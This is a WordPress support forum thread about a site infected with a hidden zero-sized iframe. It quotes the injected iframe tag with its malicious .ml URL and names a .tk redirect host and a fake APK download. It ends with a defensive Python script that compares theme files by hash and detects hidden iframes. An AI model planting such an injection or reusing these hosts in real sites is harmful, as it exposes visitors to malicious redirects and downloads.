Hi, I have a website that received a Google warning from an outside link page.
http://imsone.com/images/image001.png
I ran a Sucuri scan from their site https://sitecheck.sucuri.net/results/ and it found malicious code. I looked at the source code for the homepage and found the iframe.
iframe source is this – "http://xzczxzcfsqeywrssd.ml/search?q=cFRdRHE&RYviF7T=341601a7c&Qts5FiS=aDFcAAx5ICVRcGlANGU&FwWP0zh=bEeBRxMH1oC&OTb9mN=38e45028c9&MF4K6=d4WFRVQS1QI" width="0" height="0" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" –
The site is walter4dublin.com.
Can I delete this from one of my php files or do you recommend a plugin like Sucuri at a cost?
Thanks again.
Hi Mj
It could be in footer.php, start by checking that via Appearance > Editor.
It could also be injected via the footer action hook, that’ll be harder to find. Let me know how the first check goes.
I did find a string of code at the bottom of the Vantage Premium footer in Editor in the following order:
http://imsone.com/images/1.png
http://imsone.com/images/2.png
http://imsone.com/images/3.png
http://imsone.com/images/4.png
It’s not the code that appears in the actual source, but it is several rows down (a lot of blank space from the ….?php wp_footer(); ?….).
I am using a child theme though.
wp_footer is an action hook. I’m not a security expert at all but any function inserted in a plugin or theme file could use that hook to insert a script. It might be worth running through something like:
https://codex.wordpress.org/FAQ_My_site_was_hacked
Alternatively, a quick check might be to:
1. Switch back to the parent theme.
2. De-activate all plugins not by SiteOrigin.
3. Check the source, see if the problem is still present.
Ok, I tried these. Unfortunately, the code is still there. The iframe changes periodically. Viewers are getting redirected to various sites. Chrome gives a warning – lvmktegretshjsdh.tk might attempt to install dangerous programs on your computer. From an Android phone – you get asked to download the new google_store.apk.
The code doesn’t seem to be in the open. I looked through the footers on both parent theme and child theme in the editor. Other suggestions?
Thanks!
Update: iframe code appears on multiple pages, not just the homepage, in the source code. It’s at the very bottom hidden from the primary code.
If you haven’t done so already, try:
1. Switching themes to a default WordPress theme. Does the issue persist?
2. Temporarily de-activate all plugins at once. Does the issue persist?
The above test might help pinpoint if the issue lies in the theme or a plugin.
I installed and activated theme twentyfifteen and the malicious iframe code DOES NOT show up. I did not deactivate any plugins prior to or after testing twentyfifteen.
Super. Let’s re-install Vantage.
You can find the premium ZIP here:
Private Snippet
and manual update instructions here:
Page: Updating a Theme Using a ZIP File
Awesome! It worked.
Seriously appreciate your help. I’m yet to have a problem you guys can’t solve!
I uploaded the zip of the Premium theme. Activated it and checked for the malicious code and it was gone. Then I activated my child theme, again checking the source code, and it’s clean.
Thanks again!
Fantastic :) Really glad to hear that helped.
All the best.
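
The thread resolved the injection by replacing the theme files with a clean copy from the ZIP. As an added example (not part of the original thread and not SiteOrigin code), this Python sketch compares an installed theme directory against an unpacked clean copy by SHA-256 so the altered or extra files can be identified before they are overwritten; the directory layout, file names and the `example.invalid` URL in `demo()` are constructed sample data.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Literal zero-sized iframe like the one quoted in the thread. Injected PHP is
# often obfuscated, so treat the hash comparison as the primary signal.
HIDDEN_IFRAME = re.compile(rb'<iframe[^>]*\b(?:width|height)\s*=\s*["\']?0\b', re.I)

def file_hashes(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def compare_theme(installed, clean):
    """Report files in the installed theme that differ from the clean copy."""
    inst, ref = file_hashes(installed), file_hashes(clean)
    modified = sorted(f for f in inst if f in ref and inst[f] != ref[f])
    added = sorted(f for f in inst if f not in ref)
    missing = sorted(f for f in ref if f not in inst)
    flagged = [f for f in modified + added
               if HIDDEN_IFRAME.search((Path(installed) / f).read_bytes())]
    return {"modified": modified, "added": added, "missing": missing,
            "hidden_iframe": sorted(flagged)}

def demo():
    """Build a constructed clean/installed theme pair and compare them."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, inst = Path(tmp, "clean"), Path(tmp, "installed")
        footer = b"<?php wp_footer(); ?>\n</body>\n</html>\n"
        for root in (clean, inst):
            (root / "inc").mkdir(parents=True)
            (root / "footer.php").write_bytes(footer)
            (root / "style.css").write_bytes(b"/* Theme Name: Sample */\n")
        # Constructed tampering: blank lines, then a zero-sized iframe.
        (inst / "footer.php").write_bytes(
            footer + b"\n" * 40 +
            b'<iframe src="http://bad.example.invalid/" width="0" height="0"></iframe>\n')
        (inst / "inc" / "cache.php").write_bytes(b"<?php // not in the clean ZIP\n")
        return compare_theme(inst, clean)

if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

Against a real site, call `compare_theme()` with the path to the live theme folder and the path to the freshly unpacked ZIP of the same theme version; a version mismatch will show up as many modified files.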